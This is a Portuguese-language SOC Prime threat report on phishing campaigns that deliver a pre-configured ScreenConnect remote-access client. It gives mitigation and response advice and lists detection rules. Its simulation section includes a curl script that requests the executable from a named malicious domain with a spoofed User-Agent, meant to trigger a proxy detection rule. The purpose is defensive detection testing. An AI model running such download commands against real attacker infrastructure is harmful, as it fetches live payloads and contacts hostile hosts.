SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

Cliente ScreenConnect Usado Indevidamente para Habilitar Acesso Remoto Não Autorizado

Author Photo
SOC Prime Team linkedin icon Seguir
Cliente ScreenConnect Usado Indevidamente para Habilitar Acesso Remoto Não Autorizado
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os atacantes estão usando e-mails de phishing para distribuir um cliente ScreenConnect legítimo e pré-configurado. A ferramenta de Monitoramento e Gerenciamento Remoto (RMM) estabelece uma conexão de callback para uma instância controlada por um atacante, proporcionando acesso remoto a sistemas comprometidos. A campanha abusa da natureza confiável do software legítimo para evitar controles de segurança básicos e mecanismos de detecção.

Investigação

O investigador examinou um e-mail de phishing contendo um link que entregava um arquivo PE. A análise confirmou que o arquivo era um cliente ScreenConnect legítimo e digitalmente assinado. No entanto, sua configuração incorporada foi modificada para se conectar a uma instância de retransmissão específica e a um ID de instância controlado pelo ator da ameaça.

Mitigação

Os navegadores podem bloquear downloads de arquivos executáveis como uma camada inicial de proteção. As organizações devem monitorar o uso não autorizado de ferramentas RMM e impor controles estritos em executáveis baixados de links da web não confiáveis. A lista de permissões de aplicativos também pode ajudar a evitar que clientes ScreenConnect não autorizados e outro software RMM não aprovado sejam executados.

Resposta

Quando uma atividade maliciosa é detectada, isole o endpoint afetado para evitar que o atacante continue o acesso remoto. Identifique e termine quaisquer processos ativos do ScreenConnect. Realize uma análise forense da configuração do cliente para identificar a infraestrutura de comando e controle do atacante e determinar o alcance do acesso não autorizado ao sistema comprometido.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Software Alternativo de Acesso/ Gerenciamento Remoto (via criação de processo)

Equipe SOC Prime
05 Out 2026

Possível Atividade de Comando e Controle por Tentativa de Comunicação de Domínio de Software de Acesso Remoto (via DNS)

Equipe SOC Prime
05 Out 2026

Distribuição de Malware do Cliente ScreenConnect via E-mail de Phishing [Proxy HTTP]

Regras de IA da SOC Prime
05 Out 2026

Execução de Simulação

  • Narrativa & Comandos de Ataque: O adversário visa estabelecer persistência em uma estação de trabalho alvo distribuindo o ScreenConnect por meio de uma campanha de phishing. Nesta simulação, replicamos o estágio final: a máquina da vítima fazendo uma solicitação HTTP de saída para um domínio comprometido/malicioso para baixar o executável de configuração. Para imitar o comportamento específico identificado na inteligência de ameaça, o “atacante” utiliza uma string User-Agent personalizada ScreenConnect ao solicitar o caminho específico do arquivo thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Isso acionará a regra de detecção baseada em proxy.

  • Script de Teste de Regressão:

    # Este script usa curl para imitar a solicitação de download malicioso identificada na regra de detecção.
    # Ele usa o URL específico e o User-Agent específico necessário para acionar o alerta.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] Simulando tentativa de download do ScreenConnect..."
    echo "[*] URL: $TARGET_URL"
    echo "[*] User-Agent: $MALICIOUS_UA"
    
    # Usamos -k para ignorar erros de SSL se o domínio simulado utilizar um certificado autoassinado, 
    # e -A para configurar o User-Agent específico.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] Comando de simulação enviado."
  • Comandos de Limpeza:

    # Nenhum arquivo foi realmente baixado para o host na simulação (redirecionado para /dev/null).
    # Nenhuma alteração no sistema foi feita.
    echo "[*] Limpeza completa. Nenhum vestígio deixado no host."